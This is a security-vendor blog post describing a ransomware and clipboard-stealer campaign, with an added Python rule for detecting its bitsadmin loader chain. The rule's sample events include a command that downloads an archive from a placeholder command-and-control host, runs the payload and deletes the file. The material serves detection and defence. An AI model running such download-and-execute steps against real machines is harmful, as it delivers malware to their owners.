The PolySwarm Blog


MortalKombat Ransomware Used in Recent Campaign

Feb 24, 2023 1:57:55 PM / by The Hivemind

Related Families: Xorist, Laplas Clipper

Executive Summary

Cisco Talos recently reported on threat actor activity leveraging MortalKombat ransomware and Laplas Clipper. MortalKombat encrypts files on the infected machine and drops a ransom note instructing victims on how to pay the ransom to recover their files.

Key Takeaways

  • Cisco Talos recently reported on threat actor activity leveraging MortalKombat ransomware and Laplas Clipper.
  • The initial infection vector is cryptocurrency-themed phishing emails that lead to a multi-stage attack chain.
  • MortalKombat encrypts files on the infected machine and drops a ransom note instructing victims on how to pay the ransom to recover their files.

The Campaign

Cisco Talos recently reported on threat actor activity leveraging MortalKombat ransomware and Laplas Clipper. According to researchers at Cisco Talos, the unidentified threat actor group responsible for the activity is financially motivated.

The initial infection vector is cryptocurrency-themed phishing emails that lead to a multi-stage attack chain. The phishing emails contain an attached ZIP file with a BAT loader script. When a victim opens the loader script, it uses the LOLBin (living-off-the-land binary) bitsadmin to download a second malicious ZIP file from an actor-controlled C2. The payload, which is either MortalKombat ransomware or the Go variant of Laplas Clipper, is automatically executed. The dropped payload runs as a process on the infected machine, and the loader script then deletes the malicious files in an attempt to clean up infection markers.
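The loader behaviour described above (a BAT script spawning bitsadmin to fetch a ZIP, executing it, then deleting the archive) leaves a recognisable process chain. The following detection logic is an added example, not code from Cisco Talos or PolySwarm; it runs over constructed Sysmon-style process-creation events whose field names, paths, URL and pids are assumptions, and flags bitsadmin archive downloads parented by cmd.exe, escalating when a sibling process later deletes the downloaded file.

```python
import re

# Constructed process-creation events in a Sysmon-like shape, not logs from the real
# campaign: pid/ppid tie each child back to the cmd.exe that runs the loader script.
SAMPLE_EVENTS = [
    {"pid": 1200, "ppid": 900, "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'cmd.exe /c "C:\Users\victim\Downloads\invoice\loader.bat"'},
    {"pid": 1210, "ppid": 1200, "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"bitsadmin /transfer upd /download /priority high "
                r"http://c2.example.invalid/p.zip C:\Users\victim\AppData\Local\Temp\p.zip"},
    {"pid": 1220, "ppid": 1200, "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"C:\Users\victim\AppData\Local\Temp\p.exe"},
    {"pid": 1230, "ppid": 1200, "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c del /f /q "C:\Users\victim\AppData\Local\Temp\p.zip"'},
    # Benign: an administrator listing BITS jobs from an interactive shell.
    {"pid": 1300, "ppid": 950, "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"bitsadmin /list /allusers"},
]

DOWNLOAD_RE = re.compile(r"^\s*(?:\S*\\)?bitsadmin(?:\.exe)?\s+.*?/(?:transfer|addfile)\b", re.I)
URL_RE = re.compile(r"https?://\S+", re.I)

def parse_download(cmdline):
    """Return (url, destination) for a bitsadmin download, or None if it is not one."""
    if not DOWNLOAD_RE.search(cmdline) or not URL_RE.search(cmdline):
        return None
    return URL_RE.search(cmdline).group(0), cmdline.split()[-1].strip('"')

def detect_loader_chain(events):
    """Flag archive downloads via bitsadmin whose parent is cmd.exe (a .bat loader);
    escalate when a sibling process under the same parent later deletes the archive."""
    alerts = []
    for e in events:
        parsed = parse_download(e["cmdline"])
        if not e["parent"].lower().endswith("\\cmd.exe") or not parsed:
            continue
        url, dest = parsed
        if not dest.lower().endswith(".zip"):
            continue
        cleanup = any(s["ppid"] == e["ppid"] and s is not e
                      and re.search(r"\bdel\b", s["cmdline"], re.I)
                      and dest.lower() in s["cmdline"].lower() for s in events)
        alerts.append({"pid": e["pid"], "url": url, "dest": dest, "cleanup": cleanup,
                       "severity": "critical" if cleanup else "high"})
    return alerts
```

The same rule could be expressed in a SIEM query; the point is to pivot on the shared parent pid so the download and the later cleanup are correlated into one alert.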

What is MortalKombat?

MortalKombat is a novel ransomware family first discovered in January 2023. It is a 32-bit Windows executable. At this time, researchers have not identified the threat actors behind the malware. MortalKombat encrypts files on the infected machine and drops a ransom note instructing victims on how to pay the ransom to recover their files. Along with the ransom note, MortalKombat drops a wallpaper on the victim's machine with an image related to the video game Mortal Kombat. PolySwarm analysts were able to extract a copy of the MortalKombat ransom note. MortalKombat also corrupts Windows Explorer, removes startup applications and folders, and disables the Run command. The threat actors behind the attacks use qTOX messenger to communicate with victims. Cisco Talos researchers noted MortalKombat appears to belong to the Xorist malware family.

What is Laplas Clipper?

Laplas Clipper is a clipboard stealer first seen in the wild in late 2022. It is a 32-bit executable written in Go. It belongs to the Clipper malware family, which is typically used to target cryptocurrency users. Laplas Clipper uses regular expressions to monitor a victim's clipboard for cryptocurrency wallet addresses. When a wallet address is detected, the Clipper bot overwrites the clipboard contents, replacing the address with an actor-controlled wallet address so that the threat actors intercept the cryptocurrency payment.

IOCs

PolySwarm has multiple samples of MortalKombat.

You can use the following CLI command to search for all MortalKombat samples in our portal:

$ polyswarm link list -f MortalKombat

Topics: Threat Bulletin, Ransomware, Cryptocurrency, Laplas Clipper, MortalKombat, Xorist
